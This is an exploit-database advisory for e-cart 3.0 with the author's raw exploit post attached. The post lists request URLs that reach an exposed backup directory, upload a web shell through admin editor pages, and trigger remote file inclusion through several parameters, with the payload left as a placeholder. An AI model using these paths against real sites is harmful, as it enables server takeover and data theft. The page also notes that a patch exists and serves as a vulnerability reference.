e-cart 3.0 Multiple Vulnerabilities

vendor:

e-cart 3.0

by:

indoushka

9.3

CVSS

HIGH

Multiple Vulnerabilities

N/A

CWE

Product Name: e-cart 3.0

Affected Version From: e-cart 3.0

Affected Version To: e-cart 3.0

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

2008

e-cart 3.0 Multiple Vulnerabilities

e-cart 3.0 is vulnerable to Backup, Upload Shell and RFI vulnerabilities. An attacker can exploit these vulnerabilities to gain access to the system and execute malicious code. The Backup vulnerability allows an attacker to access the backup files of the system. The Upload Shell vulnerability allows an attacker to upload a malicious file to the system. The RFI vulnerability allows an attacker to inject malicious code into the system.

Mitigation:

The vendor has released a patch to address these vulnerabilities. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : e-cart 3.0 Multiple Vulnerabilities                                         |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : e-cart 3.0                                            |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : Multti Vulnerability                                                    | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
|
| Backup
|
|  1- http://server/e-cart/admin/backups/
|
| Upload Shell
|
|  2- http://server/e-cart/admin/editor/images.php ** to Upload Evil
|  3- http://server/e-cart/admin/editor/image.php  ** too Upload Evil
|  4- http://server/e-cart/images/upload/Evil ** 2 Find Evil
|
| RFi
|
|  5- http://server/e-cart/admin/includes/application_top.php?language=[EV!L]
|  6- http://server/e-cart/admin/includes/application_top.php?current_page=[EV!L]
|  7- http://server/e-cart/includes/boxes/column_banner.php?language=[EV!L]
|  8- http://server/e-cart/includes/classes/shipping.php?include_modules[i][file]=[EV!L]
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------